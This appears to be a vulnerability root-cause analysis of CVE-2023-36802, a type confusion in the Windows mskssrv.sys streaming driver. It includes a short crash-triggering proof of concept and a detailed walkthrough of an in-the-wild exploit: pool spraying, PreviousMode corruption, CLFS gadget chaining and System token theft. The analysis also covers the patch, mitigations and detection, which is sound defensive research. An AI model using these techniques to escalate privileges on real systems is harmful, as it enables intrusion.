CVE-2023-36802: Microsoft Streaming Service Proxy Elevation of Privilege Vulnerability

Benoît Sevens

The Basics

Disclosure or Patch Date: September 12, 2023

Product: Windows

Advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36802

Affected Versions:

Windows 10 without KB5030211 or KB5030214
Windows 11 without KB5030219 or KB5030217
Windows Server 2019 without KB5030214
Windows Server 2022 without KB5030216 or KB503025

First Patched Version:

Windows 10 with KB5030211 or KB5030214
Windows 11 with KB5030219 or KB5030217
Windows Server 2019 with KB5030214
Windows Server 2022 with KB5030216 or KB503025

Issue/Bug Report: N/A

Patch CL: N/A

Bug-Introducing CL: N/A

Reporter(s):

Guanghui Xia (@ze0r) with Hebei HuaCe
Quan Jin (@jq0904) & ze0r with DBAPPSecurity WeBin Lab
Valentina Palmiotti with IBM X-Force
Microsoft Threat Intelligence
Microsoft Security Response Center

The Code

Proof-of-concept:

HANDLE h;
HRESULT hr;
DWORD bytesReturned;
char buf[0x100] = {0};

hr = KsOpenDefaultDevice(KSNAME_Server, GENERIC_READ | GENERIC_WRITE, &h);

memset(buf, 'A', sizeof(buf));
*(int32_t *)buf = 1;
*((int64_t *)buf + 3) = 0;
BOOL status = DeviceIoControl(h, IOCTL_FRAMESERVER_INIT_CONTEXT, &buf, sizeof(buf), &buf, sizeof(buf), &bytesReturned, 0);

memset(buf, 'A', sizeof(buf));
*((DWORD*)buf + 8) = 1;
*((DWORD*)buf + 9) = 1;
status = DeviceIoControl(h, IOCTL_FRAMESERVER_PUBLISH_RX, &buf, sizeof(buf), &buf, sizeof(buf), &bytesReturned, 0);

Exploit sample: Not public

Did you have access to the exploit sample when doing the analysis? Yes

The Vulnerability

Bug class: Type confusion

Vulnerability details:

When a IOCTL_FRAMESERVER_PUBLISH_RX IOCTL is performed on the mskssrv device driver, a call is performed to FSRendezvousServer::PublishRx() which in its turn calls FSStreamReg::PublishRx(). FSStreamReg::PublishRx() will take whatever is in the FsContext2 field of the FILE_OBJECT and use it as a FsStreamReg object further on, as long as it is a valid object.

An attacker can precede the IOCTL_FRAMESERVER_PUBLISH_RX with a IOCTL_FRAMESERVER_INIT_CONTEXT IOCTL on the same device handle, which will initialize the FsContext2 field to an object of a different type, i.e. of type FsContextReg.

FSStreamReg::PublishRx() performs several operations on what it thinks is a FsStreamReg object, some of which lead to exploitable scenarios, like writing out of bounds.

A similar vulnerability was present in 3 other IOCTL's:

IOCTL_FRAMESERVER_PUBLISH_TX
IOCTL_FRAMESERVER_CONSUME_TX
IOCTL_FRAMESERVER_CONSUME_RX

All of these are referred to with the CVE-2023-36802 identifier.

Patch analysis:

Before the patch, FSRendezvousServer::PublishRx() would call FSRendezvousServer::FindObject() before calling into FSStreamReg::PublishRx(). Only if FSRendezvousServer::FindObject() returns TRUE, FSStreamReg::PublishRx() is called. However, FSRendezvousServer::FindObject() would not check the type of the object.

The patch changed the FSRendezvousServer::FindObject() to check if the type field of the object is specifically set to 2, otherwise it returns FALSE. The type field is set to 2 when constructing a FsStreamReg object (in FSStreamReg::FSStreamReg()). Additionally, FSRendezvousServer::FindObject() was renamed to the more appropriate name FSRendezvousServer::FindStreamObject().

Thoughts on how this vuln might have been found (fuzzing, code auditing, variant analysis, etc.):

The bug could have been found via manual code auditing or fuzzing. Looking at the proof of concept above, a combination of two IOCTL's with relatively simple input buffers triggers a crash. Valentina Palmiotti found this vulnerability via manual code auditing as described in her blog post.

(Historical/present/future) context of bug:

June 16, 2023: CVE-2023-29360, another privilege escalation vulnerability inside mskssrv.sys which was used by Synacktiv at Pwn2Own 2023, is patched and publicly disclosed. Although within the same driver, CVE-2023-29360 is quite distinct from CVE-2023-36802.
September 12, 2023: CVE-2023-36802 is patched and publicly disclosed, and reported to have been seen in the wild.
October 10, 2023: Valentina Palmiotti publishes details of CVE-2023-36802 and its exploitation.

The Exploit

(The terms exploit primitive, exploit strategy, exploit technique, and exploit flow are defined here.)

Exploit strategy (or strategies):

Leak the addresses of relevant kernel objects via the well known NtQuerySystemInformation technique.
Create a kernel pool layout so that future FSContextReg allocations land in holes surrounded by attacker controlled data.
Allocate an FSContextReg object (via an IOCTL_FRAMESERVER_INIT_CONTEXT IOCTL).
Perform an out of bounds action on the FSContextReg object (via an IOCTL_FRAMESERVER_PUBLISH_RX) which will do some interesting write and ultimately set the PreviousMode of the KTHREAD to 0.
Use NtReadVirtualMemory and NtWriteVirtualMemory on kernel addresses to copy the system token to the EPROCESS of our current process.
Clean up.
Spawn a command of interest, such as cmd.exe.

Exploit flow:

Depending on the Windows version, two different exploit flows exist in the analyzed in the wild sample. This is due to the fact that depending on the Windows version:

the FSStreamReg::PublishRx code is slightly different, ie recent mskssrv.sys versions contain a call to ObfDereferenceObject on one of the fields of the FsStreamReg object, while older versions don't
the structure layout of the FsStreamReg object is slightly different. This is important for side effects caused in the exploit flow.

Since newer mskssrv.sys versions contain a convenient call to ObfDereferenceObject, it will use that to decrement the PreviousMode field directly to 0. We will look at this exploit flow first.

Since older mskssrv.sys versions do not contain the convenient ObfDereferenceObject call, the exploit flow is a bit more convoluted. It corrupts a CLFS-specific object to call kernel gadgets via a vtable call.

CLFS-less exploit flow

Open the mskssrv device via a call to KsOpenDefaultDevice.
Leak some required kernel addresses via NtQuerySystemInformation(SystemExtendedHandleInformation, ...):
- the current KTHREAD address (and hence current PreviousMode address)
- EPROCESS address of System process and current process (and hence their respective Token address)
- FILE_OBJECT address of the mskssrv device file handle
Spray the pool with objects of size 0x80 (excluding the 0x10 byte pool header), using a well known named pipe technique of calling NtFsControlFile with fsctl code 0x119ff8.
Close some pipes to create holes in the pool spray.
Call the IOCTL_FRAMESERVER_INIT_CONTEXT ioctl:
- FsInitializeContextRendezVous() calls FSRendezvousServer::InitializeContext()
- FSRendezvousServer::InitializeContext() allocates an FsContextReg object, which has a size of 0x78 bytes, and sets the FsContext2 field in the FILE_OBJECT to point to this object. The FsContextReg object will take the spot of a previously created hole.
Refill the remaining holes.
Call the IOCTL_FRAMESERVER_PUBLISH_RX ioctl, in a separate thread:
- This will call into FSRendezvousServer::PublishRx() and subsequently FSStreamReg::PublishRx().
- FSStreamReg::PublishRx() will expect a FsStreamReg object in the FsContext2 field, which is 0x1d8 bytes large, while in fact a smaller FsContextReg object is present, neighbored with controlled data.
- FSStreamReg::PublishRx() will then call ObfDereferenceObject() on a field taken out of bounds from a neighboring object. The attacker placed the PreviousMode address of the current thread there. This will decrement the PreviousMode of the main thread to 0. At this point the attacker can call NtReadVirtualMemory and NtWriteVirtualMemory on kernel addresses from the main thread.
- If not taken care of, FSStreamReg::PublishRx() will now call KeSetEvent on another out of bounds fields, which coincides with the ProcessBilled field from a pool header of a neighboring object (which is not attacker controlled). Since this is an invalid pointer, it would bugcheck the system. To prevent this, the attacker keeps FSStreamReg::PublishRx() locked in a while loop. This is achieved by forging a self-referencing linked list entry. FSFrameMdlList::MoveNext will keep returning the same list entry. The list entry is placed in usermode, so the exploit can break this while loop on demand (see below).
Meanwhile in the main thread:
- Try to read the System process token using NtReadVirtualMemory in a loop until it succeeds. After PreviousMode gets overwritten in the other thread, this will succeed.
- Write the System token to the EPROCESS of the current process using NtWriteVirtualMemory.
- Read the value of the FsContext2 field out of the FILE_OBJECT to get the address of the FsContextReg object.
- Read (for later restore) and overwrite the ProcessBilled in one of the neighboring pool chunk headers to NULL, so KeSetEvent will not crash the system.
- Break the currently locked while loop in FSStreamReg::PublishRx() by changing the self-referencing list entry. FSStreamReg::PublishRx() will now proceed but not call KeSetEvent since the field is NULL.
- Wait for FSStreamReg::PublishRx() to finish in the other thread.
- Restore the corrupted ProcessBilled field to its original value.
- Increment the refcount in the current EPROCESS.
- Reset the PreviousMode to 1.
- Launch a command of interest, such as cmd.exe.

Exploit flow with CLFS

On older systems, FSStreamReg::PublishRx does not contain a call to ObfDereferenceObject. This is unfortunate, as ObfDereferenceObject was a very easy primitive to decrement the PreviousMode.

However, FSStreamReg::PublishRx() will still call FSFrameMdl::UnmapPages() on an address taken out of bounds from a neighboring (sprayed) object, which will do a few useful writes at an address taken out of bounds:

write QWORD 0 at offset 0xc8 from that address
write DWORD 2 at offset 0x10 from that address

How does the exploit leverage this?

Leak the required kernel addresses in the same way as in the CLFS-less exploit flow.
Create a CLFS log file, open it and leak its kernel address (using NtQuerySystemInformation(SystemExtendedHandleInformation, ...)).
Resolve some nt kernel gadgets: PoFxProcessorNotification, IoSizeofWorkItem and RtlClearBit
Forge a fake CClfsContainer object at 0x1000000 with a fake vtable at 0x1000800.
Forge a fake BitMapHeader at 0x1000400 with a bitmap pointer pointing to the PreviousMode address.
Spray the pool (again using NtFsControlFile), but the crafted objects now contain the kernel address of the CLFS log file + 0x2c9.
Create holes, allocate the FsContextReg object in a hole and refill the remaining holes, just as before.
Trigger FSStreamReg::PublishRx(). FSFrameMdl::UnmapPages() will be called on that address read out of bounds and hence write:
- QWORD 0 at offset 0x2c9+0xc8=0x391 from the start of the CLFS log file in memory
- DWORD 2 at offset 0x2c9+0x10=0x2d9 from the start of the CLFS log file in memory
Call CreateLogFile which will end up calling CClfsBaseFilePersisted::CheckSecureAccess.
- ClfsBaseFilePersisted::CheckSecureAccess will use the DWORD at offset 0x398 as an offset from the end of the log block header (of size 0x70) to find a CLFS_CONTAINER_CONTEXT object (via a call to CClfsBaseFile::GetSymbol()). But the QWORD write corrupted the least significant byte of that DWORD, which makes the offset change from 0x1460 to 0x1400. So now whatever is at CLFS log file+0x70+0x1400, will be interpreted as a CLFS_CONTAINER_CONTEXT object, which is attacker controlled data. At offset 0x18 into this object, a pointer to a CClfsContainer object is dereferenced. The exploit places the address 0x1000000 as the pointer there, where it previously prepared a fake CClfsContainer object.
- CLFS!CClfsBaseFilePersisted::CheckSecureAccess will then call the first function in the vtable of that object (which is under normal circumstances CClfsContainer::AddRef), passing the object itself as the first argument. The exploit placed the nt!PoFxProcessorNotification function in the fake vtable. (Note that there is CFG in the CLFS driver, so the exploit has to use allowed function addresses as gadgets.)
- nt!PoFxProcessorNotification will dereference a few addresses of its argument and call one of these addresses with another one of these addresses as an argument. So now the exploit controls both the function that is called and its first argument. The exploit chooses nt!RtlClearBit as the function to be called.
- nt!RtlClearBit expects 2 parameters: a pointer to a bitmap header (containing a pointer to the bitmap itself) and a bit number to clear. Recall the exploit prepared a fake bitmap header which has a bitmap pointer pointing to the PreviousMode address. The second argument - the bit number to clear - is not controlled but rdx is conveniently set to 0. nt!RtlClearBit will hence set the PreviousMode field to 0.
- For stability, the exploit prepared a second vtable entry at nt!IoSizeofWorkItem - which does nothing but set eax - because later on CClfsBaseFilePersisted::CheckSecureAccess will call what it thinks is CClfsContainer::Release.
Copy the System process token to the current EPROCESS.
Restore the original 0x1460 offset in the CLFS log file.
Restore the PreviousMode to 1.
Launch a command of interest, such as cmd.exe.

Note that in this version of mskssrv.sys and this exploit flow, the exploit didn't have to take care of the awkward KeSetEvent call. The reason is that the offset to the field passed to KeSetEvent in older versions of mskssrv.sys does not fall within a pool chunk header, but rather in controlled sprayed data and was set to NULL this way.

Notable differences with Valentina Palmiotti's exploit

It is an interesting exercise to understand the differences between the in the wild exploit described above and the exploit of Valentina Palmiotti as described in her blog post.

Valentina's exploit is based on the recent mskssrv.sys versions. The can be deduced from the presence of an ObfDereferenceObject call in the screenshots. So let's compare her exploit with the "CLFS-less exploit flow".

Valentina uses the "write 2 where" primitive provided by the FSFrameMdl::UnmapPages() call, "in conjunction with the I/O Ring technique". The exploit we analyzed used that primitive for older mskssrv.sys versions (in conjunction with a CLFS technique), but the "decrement where" primitive provided by the ObfDereferenceObject() call in newer mskssrv.sys versions.
Valentina goes through some more complicated pool grooming in combination with an infoleak in FSStreamReg::GetStats to prevent a later KeSetEvent call from crashing on an invalid pointer. The exploit analyzed here uses a different solution: it triggers the FSStreamReg::PublishRx function from a separate thread and keeps it in an locked while loop (using a self-referencing linked list entry in usermode), which prevents the KeSetEvent call from being reached. Once it has kernel R/W, it changes the field that triggers the KeSetEvent to NULL and then changes the self-referencing linked list entry so the while loop breaks. This means the KeSetEvent call will be skipped. (Afterwards it restores the field that would have triggered the KeSetEvent call because it's the owning process EPROCESS in a pool chunk).

Known cases of the same exploit flow:

The in the wild exploited CVE-2022-37969 CLFS vulnerability followed a very similar exploit flow, as descibed by Zscaler's blogpost.

Part of an exploit chain? This exploit was likely used as a standalone local privilege escalation.

The Next Steps

Variant analysis

Areas/approach for variant analysis (and why): Given the relatively simple nature of this vulnerability, as well as CVE-2023-29360, more fuzzing and code auditing on the mskssrv.sys could yield more bugs.

Found variants: N/A

Structural improvements

What are structural improvements such as ways to kill the bug class, prevent the introduction of this vulnerability, mitigate the exploit flow, make this type of vulnerability harder to exploit, etc.?

Ideas to kill the bug class:

CastGuard could have potentially caught this bug, since it seems (based on their vtables) that both the FsStreamReg and FsContextReg type derive from the same FsRegObject class.

Ideas to mitigate the exploit flow:

MTE and CHERI would not catch the type confusion, but would catch the out of bounds access as a consequence of the type confusion.
SMAP would catch the user mode access in FSStreamReg::PublishRx when dereferencing the fake FSFrameMdl pointer in the CLFS-less exploit flow. In the CLFS exploit flow, SMAP would catch the fake CClfsContainer object vtable access in usermode.
Remove kernel address leaks via NtQuerySystemInformation calls.

Other potential improvements:

N/A

0-day detection methods

What are potential detection methods for similar 0-days? Meaning are there any ideas of how this exploit or similar exploits could be detected as a 0-day?

Static signaturing of used exploit techniques (e.g. using Yara).
Analysing samples based on interesting dynamic signals, such as NtQuerySystemInformation calls using the SystemExtendedHandleInformation parameter.

Other References

Critically close to zero(day): Exploiting Microsoft Kernel streaming service by Valentina Palmiotti